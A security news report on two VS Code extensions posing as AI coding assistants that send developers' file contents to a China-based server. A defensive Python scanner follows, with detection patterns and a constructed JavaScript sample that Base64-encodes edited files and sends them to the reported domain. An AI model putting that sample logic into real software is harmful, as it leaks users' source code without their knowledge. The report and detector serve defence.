Cybersecurity researchers have discovered two malicious Microsoft Visual Studio Code (VS Code) extensions that are advertised as artificial intelligence (AI)-powered coding assistants, but also harbor covert functionality to siphon developer data to China-based servers.

The extensions, which have 1.5 million combined installs and are still available for download from the official Visual Studio Marketplace, are listed below -

  • ChatGPT - 中文版 (ID: whensunset.chatgpt-china) - 1,340,869 installs
  • ChatGPT - ChatMoss(CodeMoss)(ID: zhukunpeng.chat-moss) - 151,751 installs

Koi Security said the extensions are functional and work as expected, but they also capture every file being opened and every source code modification and transmit them to servers located in China without users' knowledge or consent. The campaign has been codenamed MaliciousCorgi.

"Both contain identical malicious code -- the same spyware infrastructure running under different publisher names," security researcher Tuval Admoni said.

What makes the activity particularly dangerous is that the extensions work exactly as advertised, providing autocomplete suggestions and explaining coding errors, which avoids raising any red flags and lowers users' suspicion.

At the same time, the embedded malicious code is designed to read all of the contents of every file being opened, encode it in Base64 format, and send it to a server located in China ("aihao123[.]cn"). The process is triggered for every edit.

The extensions also incorporate a real-time monitoring feature that can be remotely triggered by the server, causing up to 50 files in the workspace to be exfiltrated. Also present in the extension's web view is a hidden zero-pixel iframe that loads four commercial analytics software development kits (SDKs) to fingerprint the devices and create extensive user profiles.

The four SDKs used are Zhuge.io, GrowingIO, TalkingData, and Baidu Analytics, all of which are major data analytics platforms based in China.
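The behaviours described above (a hook on document open/change, Base64 encoding of file contents, traffic to the named domain, and a hidden zero-pixel iframe loading analytics SDKs) translate into checks a defender can run over locally installed extensions. The scanner below is an added example, not code from the report or from Koi Security; the two extension IDs and the domain come from the article, while the SDK hostnames and strings used to recognise the analytics SDKs are assumptions, and the JavaScript sample is constructed for offline testing, not the real extension code.

```python
import re
from pathlib import Path

# Extension IDs named in the report (publisher.name, as shown in the Marketplace).
KNOWN_BAD_IDS = {"whensunset.chatgpt-china", "zhukunpeng.chat-moss"}

# Heuristic indicators (label, regex); the SDK strings are an assumption, not from the report.
# One hook or SDK reference alone is normal for an extension; two or more hits in a file is flagged.
INDICATORS = [
    ("reported collection domain", re.compile(r"aihao123\.cn")),
    ("document open/change hook", re.compile(r"onDid(Open|Change)TextDocument")),
    ("base64 encoding of document text",
     re.compile(r"getText\(\)[\s\S]{0,120}?toString\(\s*['\"]base64['\"]\s*\)")),
    ("zero-pixel iframe", re.compile(r"<iframe[^>]*(width|height)\s*=\s*['\"]?0", re.I)),
    ("analytics SDK reference", re.compile(r"zhugeio|growingio|talkingdata|hm\.baidu\.com", re.I)),
]

def scan_source(text: str) -> list[str]:
    """Return the label of every indicator present in one JavaScript source."""
    return [label for label, rx in INDICATORS if rx.search(text)]

def assess(ext_id: str, sources: dict[str, str]) -> dict:
    """Verdict for one extension from its ID and the per-file indicator hits."""
    hits = {path: scan_source(src) for path, src in sources.items()}
    hits = {path: found for path, found in hits.items() if found}
    if ext_id.lower() in KNOWN_BAD_IDS:
        verdict = "known malicious"
    elif any(len(found) >= 2 for found in hits.values()):
        verdict = "suspicious"
    else:
        verdict = "no findings"
    return {"id": ext_id, "verdict": verdict, "hits": hits}

def scan_extensions_dir(root: Path = Path.home() / ".vscode" / "extensions") -> list[dict]:
    """Assess every extension folder (named publisher.name-version) under root."""
    results = []
    for ext_dir in sorted(p for p in root.iterdir() if p.is_dir()):
        ext_id = ext_dir.name.rsplit("-", 1)[0]  # drop the trailing "-x.y.z" version
        sources = {str(js): js.read_text(errors="ignore") for js in ext_dir.rglob("*.js")}
        results.append(assess(ext_id, sources))
    return results

# Constructed sample (not the real extension code) mirroring the reported behaviours.
SAMPLE_SOURCE = """
vscode.workspace.onDidChangeTextDocument(function (e) {
  var payload = Buffer.from(e.document.getText()).toString('base64');
  send('https://aihao123.cn', payload);   // path omitted; only the domain is from the report
});
var html = '<iframe width="0" height="0" src="https://hm.baidu.com/hm.js"></iframe>';
"""
```

Running `scan_extensions_dir()` on a workstation lists every installed extension with its verdict; a "suspicious" result on an unknown ID is a lead for manual review of the flagged file, not proof of malice.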
